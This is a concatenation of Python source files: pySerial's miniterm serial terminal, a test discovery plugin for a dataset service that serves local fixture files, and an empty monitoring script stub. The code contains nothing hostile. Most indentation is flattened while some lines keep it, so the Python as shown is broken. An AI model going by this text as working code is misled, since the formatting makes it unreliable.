miniterm.py
#!/usr/bin/python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
    raw_input = input   # in Python 3, input() already behaves like Python 2's raw_input
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
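# Illustrative only, not part of pySerial: expected outputs of key_description().
# This helper is never called; it just documents the mapping used in the help text.
def _key_description_examples():
    assert key_description('\x1d') == 'Ctrl+]'    # default exit character
    assert key_description('\x14') == 'Ctrl+T'    # default menu character
    assert key_description('a') == "'a'"          # printable keys use repr()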
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
    # switch terminal temporarily to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
                elif z in (unichr(0), unichr(0x0e)):  # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
            # on RFC 2217 ports, this can happen if no modem state notification
            # has been received yet; ignore this error
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
elif c == self.menu_character:
menu_active = True # next char will be for menu
elif c == self.exit_character:
self.stop() # exit app
break
else:
#~ if self.raw:
text = c
for transformation in self.tx_transformations:
text = transformation.tx(text)
self.serial.write(self.tx_encoder.encode(text))
if self.echo:
echo_text = c
for transformation in self.tx_transformations:
echo_text = transformation.echo(echo_text)
self.console.write(echo_text)
except:
self.alive = False
raise
def handle_menu_key(self, c):
"""Implement a simple menu / settings"""
if c == self.menu_character or c == self.exit_character:
# Menu/exit character again -> send itself
self.serial.write(self.tx_encoder.encode(c))
if self.echo:
self.console.write(c)
elif c == '\x15': # CTRL+U -> upload file
self.upload_file()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(self.get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.serial.rts = not self.serial.rts
sys.stderr.write('--- RTS {} ---\n'.format('active' if self.serial.rts else 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.serial.dtr = not self.serial.dtr
sys.stderr.write('--- DTR {} ---\n'.format('active' if self.serial.dtr else 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.serial.break_condition = not self.serial.break_condition
sys.stderr.write('--- BREAK {} ---\n'.format('active' if self.serial.break_condition else 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo {} ---\n'.format('active' if self.echo else 'inactive'))
elif c == '\x06': # CTRL+F -> edit filters
self.change_filter()
elif c == '\x0c': # CTRL+L -> EOL mode
modes = list(EOL_TRANSFORMATIONS) # keys
eol = modes.index(self.eol) + 1
if eol >= len(modes):
eol = 0
self.eol = modes[eol]
sys.stderr.write('--- EOL: {} ---\n'.format(self.eol.upper()))
self.update_transformations()
elif c == '\x01': # CTRL+A -> set encoding
self.change_encoding()
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
#~ elif c == '\x01': # CTRL+A -> cycle escape mode
#~ elif c == '\x0c': # CTRL+L -> cycle linefeed mode
elif c in 'pP': # P -> change port
self.change_port()
elif c in 'sS': # S -> suspend / open port temporarily
self.suspend_port()
elif c in 'bB': # B -> change baudrate
self.change_baudrate()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
        elif c == '7':  # 7 -> change to 7 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
        elif c == '1':  # 1 -> change to 1 stop bit
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character {} --\n'.format(key_description(c)))
def upload_file(self):
"""Ask user for filenname and send its contents"""
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
with self.console:
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
with open(filename, 'rb') as f:
sys.stderr.write('--- Sending file {} ---\n'.format(filename))
while True:
block = f.read(1024)
if not block:
break
self.serial.write(block)
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File {} sent ---\n'.format(filename))
except IOError as e:
sys.stderr.write('--- ERROR opening file {}: {} ---\n'.format(filename, e))
def change_filter(self):
"""change the i/o transformations"""
sys.stderr.write('\n--- Available Filters:\n')
sys.stderr.write('\n'.join(
'--- {:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n--- Enter new filter name(s) [{}]: '.format(' '.join(self.filters)))
with self.console:
new_filters = sys.stdin.readline().lower().split()
if new_filters:
for f in new_filters:
if f not in TRANSFORMATIONS:
sys.stderr.write('--- unknown filter: {}\n'.format(repr(f)))
break
else:
self.filters = new_filters
self.update_transformations()
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def change_encoding(self):
"""change encoding on the serial port"""
sys.stderr.write('\n--- Enter new encoding name [{}]: '.format(self.input_encoding))
with self.console:
new_encoding = sys.stdin.readline().strip()
if new_encoding:
try:
codecs.lookup(new_encoding)
except LookupError:
sys.stderr.write('--- invalid encoding name: {}\n'.format(new_encoding))
else:
self.set_rx_encoding(new_encoding)
self.set_tx_encoding(new_encoding)
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
def change_baudrate(self):
"""change the baudrate"""
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
with self.console:
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError as e:
sys.stderr.write('--- ERROR setting baudrate: {} ---\n'.format(e))
self.serial.baudrate = backup
else:
self.dump_port_settings()
def change_port(self):
"""Have a conversation with the user to change the serial port"""
with self.console:
try:
port = ask_for_port()
except KeyboardInterrupt:
port = None
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.rts = self.serial.rts
new_serial.dtr = self.serial.dtr
new_serial.open()
new_serial.break_condition = self.serial.break_condition
except Exception as e:
sys.stderr.write('--- ERROR opening new port: {} ---\n'.format(e))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: {} ---\n'.format(self.serial.port))
# and restart the reader thread
self._start_reader()
def suspend_port(self):
"""\
        Temporarily close the port; allow the user to reconnect, exit the
        application, or change the port to leave the loop.
"""
# reader thread needs to be shut down
self._stop_reader()
self.serial.close()
sys.stderr.write('\n--- Port closed: {} ---\n'.format(self.serial.port))
do_change_port = False
while not self.serial.is_open:
sys.stderr.write('--- Quit: {exit} | p: port change | any other key to reconnect ---\n'.format(
exit=key_description(self.exit_character)))
k = self.console.getkey()
if k == self.exit_character:
self.stop() # exit app
break
elif k in 'pP':
do_change_port = True
break
try:
self.serial.open()
except Exception as e:
sys.stderr.write('--- ERROR opening port: {} ---\n'.format(e))
if do_change_port:
self.change_port()
else:
# and restart the reader thread
self._start_reader()
sys.stderr.write('--- Port opened: {} ---\n'.format(self.serial.port))
def get_help_text(self):
"""return the help text"""
# help text, starts with blank line!
return """
--- pySerial ({version}) - miniterm - help
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {info:7} Show info
--- {upload:7} Upload file (prompt will be shown)
--- {repr:7} encoding
--- {filter:7} edit filters
--- Toggles:
--- {rts:7} RTS {dtr:7} DTR {brk:7} BREAK
--- {echo:7} echo {eol:7} EOL
---
--- Port settings ({menu} followed by the following):
--- p change port
--- 7 8 set data bits
--- N E O S M change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""".format(version=getattr(serial, 'VERSION', 'unknown version'),
exit=key_description(self.exit_character),
menu=key_description(self.menu_character),
rts=key_description('\x12'),
dtr=key_description('\x04'),
brk=key_description('\x02'),
echo=key_description('\x05'),
info=key_description('\x09'),
upload=key_description('\x15'),
repr=key_description('\x01'),
filter=key_description('\x06'),
eol=key_description('\x0c'))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# default args can be used to override when calling main() from another script
# e.g. to create a miniterm-my-device.py
def main(default_port=None, default_baudrate=9600, default_rts=None, default_dtr=None):
"""Command line tool, entry point"""
import argparse
parser = argparse.ArgumentParser(
description="Miniterm - A simple terminal program for the serial port.")
parser.add_argument(
"port",
nargs='?',
help="serial port name ('-' to show port list)",
default=default_port)
parser.add_argument(
"baudrate",
nargs='?',
type=int,
help="set baud rate, default: %(default)s",
default=default_baudrate)
group = parser.add_argument_group("port settings")
group.add_argument(
"--parity",
choices=['N', 'E', 'O', 'S', 'M'],
type=lambda c: c.upper(),
help="set parity, one of {N E O S M}, default: N",
default='N')
group.add_argument(
"--rtscts",
action="store_true",
help="enable RTS/CTS flow control (default off)",
default=False)
group.add_argument(
"--xonxoff",
action="store_true",
help="enable software flow control (default off)",
default=False)
group.add_argument(
"--rts",
type=int,
help="set initial RTS line state (possible values: 0, 1)",
default=default_rts)
group.add_argument(
"--dtr",
type=int,
help="set initial DTR line state (possible values: 0, 1)",
default=default_dtr)
group.add_argument(
"--ask",
action="store_true",
help="ask again for port when open fails",
default=False)
group = parser.add_argument_group("data handling")
group.add_argument(
"-e", "--echo",
action="store_true",
help="enable local echo (default off)",
default=False)
group.add_argument(
"--encoding",
dest="serial_port_encoding",
metavar="CODEC",
help="set the encoding for the serial port (e.g. hexlify, Latin1, UTF-8), default: %(default)s",
default='UTF-8')
group.add_argument(
"-f", "--filter",
action="append",
metavar="NAME",
help="add text transformation",
default=[])
group.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="end of line mode",
default='CRLF')
group.add_argument(
"--raw",
action="store_true",
help="Do no apply any encodings/transformations",
default=False)
group = parser.add_argument_group("hotkeys")
group.add_argument(
"--exit-char",
type=int,
metavar='NUM',
help="Unicode of special character that is used to exit the application, default: %(default)s",
default=0x1d) # GS/CTRL+]
group.add_argument(
"--menu-char",
type=int,
metavar='NUM',
help="Unicode code of special character that is used to control miniterm (menu), default: %(default)s",
default=0x14) # Menu: CTRL+T
group = parser.add_argument_group("diagnostics")
group.add_argument(
"-q", "--quiet",
action="store_true",
help="suppress non-error messages",
default=False)
group.add_argument(
"--develop",
action="store_true",
help="show Python traceback on error",
default=False)
args = parser.parse_args()
if args.menu_char == args.exit_char:
parser.error('--exit-char can not be the same as --menu-char')
if args.filter:
if 'help' in args.filter:
sys.stderr.write('Available filters:\n')
sys.stderr.write('\n'.join(
'{:<10} = {.__doc__}'.format(k, v)
for k, v in sorted(TRANSFORMATIONS.items())))
sys.stderr.write('\n')
sys.exit(1)
filters = args.filter
else:
filters = ['default']
while True:
# no port given on command line -> ask user now
if args.port is None or args.port == '-':
try:
args.port = ask_for_port()
except KeyboardInterrupt:
sys.stderr.write('\n')
parser.error('user aborted and port is not given')
else:
if not args.port:
parser.error('port is not given')
try:
serial_instance = serial.serial_for_url(
args.port,
args.baudrate,
parity=args.parity,
rtscts=args.rtscts,
xonxoff=args.xonxoff,
do_not_open=True)
if not hasattr(serial_instance, 'cancel_read'):
# enable timeout for alive flag polling if cancel_read is not available
serial_instance.timeout = 1
if args.dtr is not None:
if not args.quiet:
sys.stderr.write('--- forcing DTR {}\n'.format('active' if args.dtr else 'inactive'))
serial_instance.dtr = args.dtr
if args.rts is not None:
if not args.quiet:
sys.stderr.write('--- forcing RTS {}\n'.format('active' if args.rts else 'inactive'))
serial_instance.rts = args.rts
serial_instance.open()
except serial.SerialException as e:
sys.stderr.write('could not open port {}: {}\n'.format(repr(args.port), e))
if args.develop:
raise
if not args.ask:
sys.exit(1)
else:
args.port = '-'
else:
break
miniterm = Miniterm(
serial_instance,
echo=args.echo,
eol=args.eol.lower(),
filters=filters)
miniterm.exit_character = unichr(args.exit_char)
miniterm.menu_character = unichr(args.menu_char)
miniterm.raw = args.raw
miniterm.set_rx_encoding(args.serial_port_encoding)
miniterm.set_tx_encoding(args.serial_port_encoding)
if not args.quiet:
sys.stderr.write('--- Miniterm on {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits} ---\n'.format(
p=miniterm.serial))
sys.stderr.write('--- Quit: {} | Menu: {} | Help: {} followed by {} ---\n'.format(
key_description(miniterm.exit_character),
key_description(miniterm.menu_character),
key_description(miniterm.menu_character),
key_description('\x08')))
miniterm.start()
try:
miniterm.join(True)
except KeyboardInterrupt:
pass
if not args.quiet:
sys.stderr.write("\n--- exit ---\n")
miniterm.join()
miniterm.close()
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
main()
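# A minimal sketch, not part of miniterm.py: driving the Miniterm class above
# programmatically instead of through main(). The port name and settings below
# are placeholders.
def run_miniterm(port='/dev/ttyUSB0', baudrate=115200):
    ser = serial.serial_for_url(port, baudrate, timeout=1)
    term = Miniterm(ser, echo=False, eol='crlf', filters=['default'])
    term.exit_character = unichr(0x1d)   # Ctrl+]
    term.menu_character = unichr(0x14)   # Ctrl+T
    term.set_rx_encoding('UTF-8')
    term.set_tx_encoding('UTF-8')
    term.start()
    try:
        term.join(True)
    except KeyboardInterrupt:
        pass
    term.join()
    term.close()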
test_discovery.py
import asyncio
from http.server import HTTPServer, SimpleHTTPRequestHandler
import logging
import os
import shutil
import threading
from datamart_core import Discoverer
from datamart_core.common import setup_logging
logger = logging.getLogger(__name__)
class TestDiscoverer(Discoverer):
"""Discovery plugin for the test suite.
"""
def discover_datasets(self):
# Put this one on disk
with open('geo.csv', 'rb') as src:
with self.write_to_shared_storage('geo') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
# Omit name, should be set to 'geo' automatically
'description': "Another simple <em>CSV</em> with places",
'source': 'remi',
},
dataset_id='geo',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/geo_wkt.csv'),
{
'name': 'geo_wkt',
'description': "Simple CSV in <a href=\"https://en.wikipedia.o"
+ "rg/wiki/Well-known_text_representation_of_ge"
+ "ometry\">WKT</a> format",
'source': 'remi',
},
dataset_id='geo_wkt',
)
# Put this one on disk
with open('agg.csv', 'rb') as src:
with self.write_to_shared_storage('agg') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
# Omit name, should be set to 'agg' automatically
'description': "Simple CSV with ids and salaries to test "
+ "aggregation for numerical attributes",
'source': 'fernando',
},
dataset_id='agg',
)
# Put this one on disk
with open('lazo.csv', 'rb') as src:
with self.write_to_shared_storage('lazo') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
# Omit name, should be set to 'lazo' automatically
'description': "Simple CSV with states and years"
" to test the Lazo index service",
'source': 'fernando',
},
dataset_id='lazo',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/empty.csv'),
{
# Omit name, should be set to 'empty' automatically
'description': "A CSV with no rows to test alternate index",
'source': 'remi',
},
dataset_id='empty',
)
# Put this one on disk
with open('daily.csv', 'rb') as src:
with self.write_to_shared_storage('daily') as dst:
shutil.copyfileobj(src, dst)
self.record_dataset(
dict(),
{
'name': 'daily',
'description': "Temporal dataset with daily resolution",
'source': 'remi',
},
dataset_id='daily',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/hourly.csv'),
{
# Omit name, should be set to 'hourly' automatically
'description': "Temporal dataset with hourly resolution",
'source': 'remi',
},
dataset_id='hourly',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/invalid.bin'),
{
'name': 'Invalid, binary',
'description': "Some binary data that can't be parsed",
'source': 'remi',
},
dataset_id='invalid',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/dates_pivoted.csv'),
{
'name': 'dates pivoted',
'description': "Temporal dataset but in columns",
'source': 'remi',
},
dataset_id='dates_pivoted',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/years_pivoted.csv'),
{
'name': 'years pivoted',
'description': "Temporal dataset but in columns",
'source': 'remi',
},
dataset_id='years_pivoted',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/spss.sav'),
{
# Omit name, should be set to 'spss' automatically
'description': "SPSS format test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/SPSS',
},
dataset_id='spss',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/excel.xlsx'),
{
# Omit name, should be set to 'excel' automatically
'description': "Excel format 2007 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Microsoft_Excel',
},
dataset_id='excel',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/excel97.xls'),
{
# Omit name, should be set to 'excel97' automatically
'description': "Excel format 1997 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Microsoft_Excel',
},
dataset_id='excel97',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/stata114.dta'),
{
# Omit name, should be set to 'stata114' automatically
'description': "Stata format 114 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Stata',
},
dataset_id='stata114',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/stata118.dta'),
{
# Omit name, should be set to 'stata118' automatically
'description': "Stata format 118 test",
'source': 'remi',
'source_url': 'https://en.wikipedia.org/wiki/Stata',
},
dataset_id='stata118',
)
# Use URL for this one
self.record_dataset(
dict(direct_url='http://test-discoverer:8080/basic.csv'),
{
'name': "basic",
'description': "This is a very simple CSV with people",
'source': 'remi',
},
dataset_id='basic',
)
def server():
with HTTPServer(('0.0.0.0', 8080), SimpleHTTPRequestHandler) as httpd:
httpd.serve_forever()
if __name__ == '__main__':
setup_logging()
os.chdir('tests/data')
# Start a web server
server_thread = threading.Thread(target=server)
    server_thread.daemon = True
server_thread.start()
fut = asyncio.ensure_future(
TestDiscoverer('datamart.test').run()
)
asyncio.get_event_loop().run_forever()
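# A minimal sketch following the same record_dataset() pattern as above; the URL,
# metadata values, and dataset id are placeholders, not real test fixtures.
class ExampleDiscoverer(Discoverer):
    def discover_datasets(self):
        self.record_dataset(
            dict(direct_url='http://test-discoverer:8080/example.csv'),
            {
                # Omit name, should be set to 'example' automatically
                'description': "Placeholder CSV illustrating record_dataset()",
                'source': 'example',
            },
            dataset_id='example',
        )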
monitoring-report.py
#!/usr/bin/python3
